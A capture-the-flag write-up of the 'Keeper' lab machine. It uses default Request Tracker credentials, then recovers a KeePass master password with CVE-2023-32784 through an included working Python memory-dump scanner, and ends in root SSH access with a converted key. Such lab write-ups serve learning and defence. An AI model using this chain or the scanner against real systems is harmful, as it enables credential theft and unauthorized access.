
Keeper

Personal Rating: Easy

Last updated 1 year ago

Enumeration

sudo nmap -v -sV <IP>

Nmap scan report for 10.10.11.227
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Port 80 serves a login page whose footer identifies the software as RT 4.4.4+dfsg-2ubuntu1 from BestPractical (Request Tracker).

Default Creds & Pillaging

The default credentials root:password worked to log in.

On the homepage there was one ticket about a Windows KeePass issue, and a username.

There are also mail addresses:

  • root@localhost

  • rt@keeper.htb

  • webmaster@keeper.htb

  • rt-comment@keeper.htb

There are ticket messages that point to insecure handling of sensitive data and files:

Lise,
"Attached to this ticket is a crash dump of the keepass program"

I have saved the file to my home directory and removed the attachment for security reasons.

Once my investigation of the crash dump is complete, I will let you know.

The user record of the ticket author:

Real Name: Enoch Root
Email Address: root@localhost
Name: root

The Shredder admin tool also reveals a path on the server:

Shredder needs a directory to write dumps to.
Please ensure that the directory /var/lib/request-tracker4/data/RT-Shredder
exists and that it is writable by your web server.

I continued pillaging the ticket system and found credentials:

KeePass Database Exploit

Logging in with these credentials via SSH worked. Investigating the KeePass version, I found CVE-2023-32784 (recovery of the master password from a process memory dump, KeePass 2.x before 2.54) to be likely exploitable. Running a PoC against the crash dump gave this result: dgrd med flde

Something was clearly off with the result.

I tried a different PoC, thinking that the first one was not working: https://github.com/vdohney/keepass-password-dumper

The result was ødgrød med fløde, which shows what the issue with the first PoC was: it silently dropped the non-ASCII characters (ø). This result did not work as the password either. That is expected for this CVE: each typed character is recovered from a leftover "●●●X" string that KeePass leaves in memory, and the first character never leaves such a string, so the leading character is always missing and has to be guessed.

Searching for that phrase yields "Rødgrød med Fløde", a well known Danish dessert (and tongue-twister), which then worked as the password when supplied from a file rather than typed at the prompt.
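To make concrete why the two PoCs disagreed and why the leading character is always absent, here is an added Python example that is not part of the original writeup or of either PoC. It re-implements the CVE-2023-32784 scan over a constructed dump (the fake dump is built by the script itself; no real KeePass.DMP is read), with an `ascii_only` switch that reproduces the first PoC's lossy behaviour. The function and variable names are this example's own.

```python
"""Minimal re-implementation of the CVE-2023-32784 master-password recovery idea.

KeePass 2.x (< 2.54) built the master password in a SecureTextBoxEx control.  For
every character typed, a leftover .NET string of the form "●●●…●X" (U+25CF bullets
followed by the newly typed character, UTF-16LE in memory) stayed behind in process
memory.  Scanning a dump for those strings recovers every character except the
first, which is never written in that form.  The dump used here is CONSTRUCTED,
not a real KeePass.DMP, so the script runs offline.
"""
import random
import re
from collections import defaultdict

BULLET = "\u25cf"                      # what KeePass shows for masked characters
BULLET_LE = BULLET.encode("utf-16-le")  # b"\xcf\x25" as it sits in memory
# one or more bullets, then the two bytes of the newly typed UTF-16LE code unit
PATTERN = re.compile(rb"(?:\xcf\x25)+([\x00-\xff]{2})")


def build_fake_dump(password: str, seed: int = 7) -> bytes:
    """Constructed dump: the leftover strings KeePass would leave for `password`,
    interleaved with unrelated bytes and shuffled, as in a real process image."""
    chunks = []
    for i in range(1, len(password)):   # index 0 never leaves a leftover string
        chunks.append((BULLET * i + password[i]).encode("utf-16-le"))
    noise = [b"\x00" * 8, b"KeePass.exe\x00", b"\x41\x00\x42\x00", b"\xff" * 5]
    chunks.extend(noise * 4)
    random.Random(seed).shuffle(chunks)
    return b"".join(chunks)


def collect_candidates(dump: bytes, ascii_only: bool = False) -> dict:
    """Map password index -> set of candidate characters seen after a bullet run.
    ascii_only=True mimics a PoC that discards non-ASCII code units, which is
    what turns 'ødgrød med fløde' into 'dgrd med flde' (every ø silently lost)."""
    found = defaultdict(set)
    for m in PATTERN.finditer(dump):
        n_bullets = (m.end() - m.start() - 2) // 2   # bullets = password index
        try:
            ch = m.group(1).decode("utf-16-le")
        except UnicodeDecodeError:                   # lone surrogate: not a char
            continue
        if ch == BULLET or not ch.isprintable():     # trailing bullet / garbage
            continue
        if ascii_only and not ch.isascii():
            continue
        found[n_bullets].add(ch)
    return dict(found)


def reconstruct(found: dict, placeholder: str = "?") -> str:
    """Render candidates as a password string.  Index 0 is unrecoverable by
    design; an index with several candidates is rendered as {a|b}."""
    if not found:
        return ""
    out = [placeholder]                              # first character: unknown
    for i in range(1, max(found) + 1):
        cands = sorted(found.get(i, ()))
        if not cands:
            out.append(placeholder)
        elif len(cands) == 1:
            out.append(cands[0])
        else:
            out.append("{" + "|".join(cands) + "}")
    return "".join(out)


def recover(dump: bytes, ascii_only: bool = False, placeholder: str = "?") -> str:
    return reconstruct(collect_candidates(dump, ascii_only), placeholder)


if __name__ == "__main__":
    dump = build_fake_dump("rødgrød med fløde")      # constructed, see above
    print(recover(dump))                                  # ?ødgrød med fløde
    print(recover(dump, ascii_only=True, placeholder=""))  # dgrd med flde
```

Against a real dump the same scan usually yields more than one candidate for some indices (stale memory next to a bullet run), which is why the PoC prints candidate sets rather than a single string; the first index has to be brute-forced or guessed, as the writeup does with the leading "R".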

Persistence

Finally, I converted the PuTTY-format key (root.ppk) to OpenSSH format and used it to log in as root:

# puttygen ships with putty-tools; -O selects the output format
puttygen root.ppk -O private-openssh -o id_rsa
# ssh refuses private keys readable by other users
chmod 600 id_rsa
ssh -i id_rsa root@10.10.11.227

root@keeper:~# cat root.txt

The site on port 80 refers to a subdomain, which I added to my hosts file. The RT pages referenced in this writeup:

http://tickets.keeper.htb/rt/
http://tickets.keeper.htb/rt/Admin/Tools/Shredder
http://tickets.keeper.htb/rt/Admin/Tools/Configuration.html